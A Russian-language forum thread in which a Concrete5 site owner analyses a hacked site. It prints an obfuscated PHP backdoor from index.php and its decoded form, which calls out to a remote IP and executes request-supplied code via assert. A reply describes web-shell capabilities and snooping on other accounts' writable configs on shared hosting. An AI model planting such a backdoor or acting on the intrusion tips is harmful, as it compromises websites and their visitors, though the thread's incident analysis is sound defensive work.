Сoncrete5 Russia

Получил письмо от Рег.ру, что он нашел php скрипт странный.
Глянул- файл-менегер, выглядит так


в access.log видно, что юзал его кто-то из украины

Код: Выделить всё

91.220.151.33 - - [04/Jul/2015:13:01:33 +0300] "POST /js/member-5.php HTTP/1.0" 200 12478 "http://craftplay.ru/js/member-5.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"

IP диапазон: 91.220.151.0 - 91.220.151.255
Название провайдера: FOP Krapko Olexandr Muhaylovich

На этой странице была ссылка на сайт эксплойтов:

Пожалуйста зарегистрируйтесь, чтобы увидеть ссылку

, там есть и

Пожалуйста зарегистрируйтесь, чтобы увидеть ссылку

По логам FTP никаких подключений не было. Видимо вскрыли через C5

В Index.php находил такое

Код: Выделить всё

//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLc ... vLlWqXGftsK0="));'));
//###=i=###


Мой dr.web реагирует на него как на BackDoor

Расшифровываем:

Код: Выделить всё

if (isset($ibv)) {
   echo $ibv;
} else {
   if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
   
   if(!isset($c_["HTTP_ACCEPT_CHARSET"])){
      if(preg_match("!.!u",file_get_contents($_SERVER["SCRIPT_FILENAME"]))){
         $c0="UTF-8";
      }else{
         $c0="windows-1251";
      }
   }else{
      $c0=$c_["HTTP_ACCEPT_CHARSET"];
   }
   
   if(function_exists("curl_init")){
      $c1=curl_init("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
      curl_setopt($c1,42,false);curl_setopt($c1,19913,true);
      $ibv = curl_exec($c1);
      curl_close($c1);
      
   }elseif(ini_get("allow_url_fopen")==1){
      $ibv = file_get_contents("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
   }

   if (isset($ibv)) {
      echo $ibv;
   }
   
   if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") {
      @assert($_REQUEST["c"]);
   }
}

На мои запросы их сервер никак не отвечает.
ИМХО: это рекламная вставка, которая перекроет сайт рекламой, или отображает рекламу для мобильных устройств

А хостинг VPS или обычный виртуальный?

Мы потестили эксплойты опубликованные на сайте, ни один не сработал, кроме DoS. Один из способов избежать действия части эксплойтов - использоваться русские имена областей на страницах.

Обычная виртуалка
Кста, есть подозрение что через фтп залили скрипт. Так как залили на сайт без cms, там было несколько аккаутов фпт на его папку, может что утекло. Логи только за неделю, саппорт не может подтвердить.

guyasyou писал(а):Кста, есть подозрение что через фтп залили скрипт.

Да легко, може троян на компе у кого-то украл пароли от ftp.

У меня так ломали на бесплатных хостах,- причем сами хостеры, когда забывал вставлять их рекламу на страницу)))

vbnm писал(а):У меня так ломали на бесплатных хостах,- причем сами хостеры, когда забывал вставлять их рекламу на страницу)))

Зачем хостерам самих себя ломать? У них прямой доступ есть, им ломать не надо.

guyasyou писал(а):Глянул - файл-менегер, выглядит так...

Это не file manager, это security shell. У него намного больше возможностей, чем у обычного менеджера файлов.
Они довольно разные бывают. Позволяют выполнять SQL-команды, искать и проверять системные файлы сервера, искать скрипты с SUID которые небезопасные, чтобы можно было с правами администратора зловред свой выполнить, позволяют загружать и выполнять exploits, смотреть информацию о системе, выполнять shell-команды, редактировать файлы, распаковывать и создавать архивы и т.д. и т.п. - зависит от самого шелла и от того, что разрешает делать сервер.
Находишь какую-либо дырку, чтобы залить через неё shell, а потом продолжаешь ковырять сервер.

Бывает весело на шэред-хостинге. Выходишь из дира своего аккаунта выше, где находятся директории других аккаунтов, которые с тобой делят этот сервер и если есть возможность, то можно там пошариться, посканить. Там бывает права на файлы конфигурации CMS да и вообще на разные скрипты установлены в 777. Т. е. можно и прочитать - посмотреть пароли/явки =) и даже отредактировать и записать туда какой-нибудь шпион/зловред.